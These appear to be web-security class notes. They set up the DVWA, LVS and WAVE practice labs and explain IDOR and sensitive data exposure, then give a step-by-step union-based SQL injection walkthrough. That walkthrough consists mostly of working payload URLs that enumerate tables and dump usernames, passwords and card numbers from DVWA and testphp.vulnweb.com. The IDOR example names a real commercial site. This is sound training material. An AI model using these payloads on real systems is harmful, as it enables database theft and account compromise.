11

1. Setting up of LVS , WAVE and DVWA...
2. For LVS
3. =======
4. Step 1 --> Extract the contents of LVS_1 in a folder
5. Step 2 --> Copy that extracted forlder in C:\xampp\htdocs
6. Step 3 --> STart XAMPP server --> Apache and MySQL
7. Step 4 --> in the browser type --> 127.0.0.1/lvs_1
8. lvs_1 --> Name of Extracted Folder
9. Download Link --> https://ufile.io/aci9l
10.  
11.  
12. For WAVE
13. ========
14. Step 1 --> Extract the contents of wave in a folder
15. Step 2 --> Copy that extracted forlder in C:\xampp\htdocs
16. Step 3 --> STart XAMPP server --> Apache and MySQL
17. Step 4 --> in the browser type --> 127.0.0.1/wave1
18. wave1 --> Name of Extracted Folder
19. Download Link --> https://ufile.io/bk3w5
20.  
21. For DVWA
22. ========
23. Step 1 --> Extract the contents of DVWA in a folder
24. Step 2 --> Copy that extracted forlder in C:\xampp\htdocs
25. Step 3 --> STart XAMPP server --> Apache and MySQL
26. Step 4 --> Open configurtion file of dvwa and delete the password field value. c:/xammp/dvwa/config/config.php
27. Step 5 --> in the browser type --> 127.0.0.1/DVWA
28. Step 6 --> login with the credentials --> admin
29. password
30.  
31. Downloading Link --> https://ufile.io/a5lg8
32.  
33.  
34. =======x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x==========
35.  
36. METHODS USED IN WEB APPLICATIONS
37. ================================
38. 1. GET - It is the method used by web applications.In this type of request all the request made is sent in plain text i.e. the request is visible at the address bar.It is very insecure method as if one person is shoulder surfing he will be able to grasp your credential and this method is also helpful for several attacks.
39. eg: www.aaab.com/haha.php?id=1
40. www.adsadsa.com/index.php?happyness=null
41.  
42.  
43. 2. POST - The method which hides and requests the data from the Database or Server Secretly. eg. twitter.com/login.php
44.  
45. Demo...
46.  
47. ----------------------------------------------------------
48.  
49. INSECURE DIRECT OBJECT REFERENCE
50. ================================
51. A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or database key. Without an access control check or other protection, attackers can manipulate these references to access unauthorized data.
52. Do note here that a malicious is able to access resources of another USER only. Both have the same level of access in case of IDOR.
53.  
54. example :
55.  
56. www.hungama.com/user.php?id=141500263
57. www.hungama.com/user.php?id=4
58. www.hungama.com/user.php?id=2
59. Without proper validation it jumps you to another account.
60.  
61. Wave1
62.  
63. ----------------------------------------------------------
64.  
65. SENSITIVE DATA EXPOSURE
66. =======================
67. Many web applications do not properly protect sensitive data such as Names, IDs, Credit Cards details, authentication credentials etc. Attackers may steal or modify such weakly protected data to conduct credit card fraud, identity theft or any other crimes. These Sensitive Data is well aspected to encryption also in which if the data is not encrypted and is in plain text, it will be very easier to get fetched by the attacker or any other individual.
68.  
69. Types of Sensitive Data
70. =======================
71.  
72. 1. Personal - Names, Address , Contact Numbers etc.
73. 2. Confidential - ID,Passwords - Credentials, Aadhar No.
74. 3. Financial - Bank Accounts numbers, credit cards, debit cards etc.
75.  
76.  
77.  
78. HOW A SENSITIVE DATA CAN BE COMPROMISED
79. --------=========================--------
80.  
81. 1. When data is transmitted in the url, that is your credentials are transmitted via GET Parameter.
82. username=user&password=pass&sumbit=submit
83. 2. When data is stored in plain text form rather then hashed or encrypted form.
84. 3. When data is stored in the text file rather then to be stored in the database.
85.  
86. Id Interest Gender Username Password
87. -----------------------------------------------
88. 1 Badminton Female admin Pa$$woRd
89. 2 Football Male admin2 paSSwOrd
90.  
91. -----------------------------------------------------------------
92. LVS
93.  
94. SQL Injections
95. ==============
96. Where an attacker passes the malicious SQL commands just to gain the juicy information from the database.
97. SQLi
98.  
99. UNION BASED SQL INJECTION
100. =========================
101. Where an attacker uses the union command to collect the information and merge it into one table. He passes malicious commands and queries in the database to do so.
102.  
103. DEMO
104. ====
105. DVWA ---> Security:Low
106. SQL Injection
107. Step 1
108. ======
109. To find 'GET' parameter.
110. something=something
111. php?id=something
112. php?id=cat
113. php?id=1
114. php?id=query
115.  
116. Either you click on some link of the web application|site or enter something in the search box.
117.  
118. http://127.0.0.1/dvwa/DVWA-1.0.8/vulnerabilities/sqli/?id=1&Submit=Submit#
119.  
120. Step 2
121. ======
122. To generate a SQL error, to break the query.
123. 1
124. 1'
125.  
126. http://127.0.0.1/dvwa/DVWA-1.0.8/vulnerabilities/sqli/?id=1'&Submit=Submit#
127.  
128. You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1''' at line 1
129.  
130. 'select * from table '
131. 'select * from table' '
132.  
133. Step 3
134. ======
135. To count the number of columns, in the web application.
136. For counting the number of columns, we will use order by
137.  
138. http://127.0.0.1/dvwa/DVWA-1.0.8/vulnerabilities/sqli/?id=1' order by 1--+&Submit=Submit#
139. Shows us data
140. This query means that we are asking the database to arrange the data according to column number 1
141.  
142. http://127.0.0.1/dvwa/DVWA-1.0.8/vulnerabilities/sqli/?id=1' order by 2--+&Submit=Submit#
143. Shows me data
144. This query means that we are asking the database to arrange the data according to column number 2
145.  
146. http://127.0.0.1/dvwa/DVWA-1.0.8/vulnerabilities/sqli/?id=1' order by 3--+&Submit=Submit#
147. Gives us an error
148. Unknown column '3' in 'order clause'
149. This query means that I am asking the database to arrange the data according to column number 3
150. But there is no column number 3 --> so it will generate an error
151.  
152. order by n--+
153. n starts from 1 and ends when i receive an error for the value of n
154. --+ ---> To comment out
155. if there is any data passed down after --+, it will not execute at all. we can also use # to comment out the rest content.
156.  
157. There are 2 columns, in the database.
158.  
159. Step 4
160. ======
161. To merge the data of all the columns, using UNION command.
162. union select 1,2,...,n-1--+
163. n=3
164. union select 1,2--+
165.  
166.  
167. http://127.0.0.1/dvwa/DVWA-1.0.8/vulnerabilities/sqli/?id=1' union select 1,2--+&Submit=Submit#
168.  
169. ID: 1' union select 1,2--
170. First name: admin
171. Surname: admin
172.  
173. ID: 1' union select 1,2--
174. First name: 1
175. Surname: 2
176.  
177. http://127.0.0.1/dvwa/DVWA-1.0.8/vulnerabilities/sqli/?id=1' union select database(),version()--+&Submit=Submit#
178.  
179. database() --> database name
180. version() --> Database Version Number
181.  
182. Step 5
183. ======
184. To call database ki ma --> information_schema, for getting the information about the table names
185. Information_schema --> it is meta table --> it contains the name of tables and columns which are present in the database.
186. information_schema.tables
187. |-> It stores the name of all the table names in the database.
188.  
189. union select table_name,2 from information_schema.tables--+
190. or
191. union select 1,table_name from information_schema.tables--+
192.  
193.  
194. We can apply both of them because both the fields are vulnerable otherwise we will go for the one which is vulnerable.
195.  
196. http://127.0.0.1/dvwa/DVWA-1.0.8/vulnerabilities/sqli/?id=1' union select 1,table_name from information_schema.tables--+&Submit=Submit#
197.  
198. Step 6
199. ======
200. I will again call database ki maa for columns names in the table names as users
201. information_schema
202. information_schema.columns
203.  
204. union select 1,column_name from information_schema.columns where table_name="users"--+
205.  
206.  
207. Step 7
208. ======
209. To retreive or dump data from the above info.
210. DVWA --> Users --> (User_id,first_name,Last_name,user,Password)
211.  
212. union select 1,group_concat(User_id,0x0a,first_name,0x0a,Last_name,0x0a,user,0x0a,Password,0x3a) from users--+
213.  
214.  
215.  
216. Password is in hashed form so we will go online and check if the hash value of the value is availble or not.
217.  
218.  
219.  
220.  
221.  
222.  
223.  
224. 1.testphp.vulnweb.com/listproducts.php?cat=1 order by 11
225.  
226. 2.http://testphp.vulnweb.com/listproducts.php?cat=1 union select 1,2,3,4,5,6,7,8,9,10,11
227.  
228. 3.http://testphp.vulnweb.com/listproducts.php?cat=1 union select 1,database(),3,4,5,6,7,8,9,10,11
229.  
230. 4.http://testphp.vulnweb.com/listproducts.php?cat=1 union select 1,version(),3,4,5,6,7,8,9,10,11
231.  
232. 5.http://testphp.vulnweb.com/listproducts.php?cat=1 union select 1,table_name,3,4,5,6,7,8,9,10,11 from information_schema.tables
233.  
234. 6.http://testphp.vulnweb.com/listproducts.php?cat=1 union select 1,column_name,3,4,5,6,7,8,9,10,11 from information_schema.columns where table_name='users'
235.  
236. 7.http://testphp.vulnweb.com/listproducts.php?cat=1 union select 1,group_concat(uname," ",pass,0x0a,cc),3,4,5,6,7,8,9,10,11 from users